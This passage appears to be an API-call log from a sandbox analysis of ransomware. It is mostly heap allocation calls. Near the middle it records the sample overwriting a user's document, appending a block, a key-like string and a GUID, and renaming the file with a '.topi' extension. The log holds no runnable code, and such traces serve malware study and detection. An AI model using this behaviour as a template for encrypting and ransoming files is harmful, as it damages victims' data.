(HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ee0 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.581] GetCurrentThreadId () returned 0x8c4 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9d10 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.582] GetCurrentThreadId () returned 0x8c4 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ee0 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ef8 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ee0 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb6e0 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.585] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xfaa6, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xfaa6, lpOverlapped=0x0) returned 1 [0097.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.586] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfaab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.586] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.586] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.586] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.586] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.586] CloseHandle (hObject=0x6a8) returned 1 [0097.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.590] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\n_XHh3jFU9i-h.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\n_xhh3jfu9i-h.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\n_XHh3jFU9i-h.ots.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\n_xhh3jfu9i-h.ots.topi")) returned 1 [0097.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.590] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.592] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12248a0, ftCreationTime.dwHighDateTime=0x1d5b599, ftLastAccessTime.dwLowDateTime=0xcad20640, ftLastAccessTime.dwHighDateTime=0x1d5c00c, ftLastWriteTime.dwLowDateTime=0xcad20640, ftLastWriteTime.dwHighDateTime=0x1d5c00c, nFileSizeHigh=0x0, nFileSizeLow=0xfaab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n_XHh3jFU9i-h.ots", cAlternateFileName="N_XHH3~1.OTS")) returned 0 [0097.592] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0097.592] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0097.592] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.594] HeapFree (in: 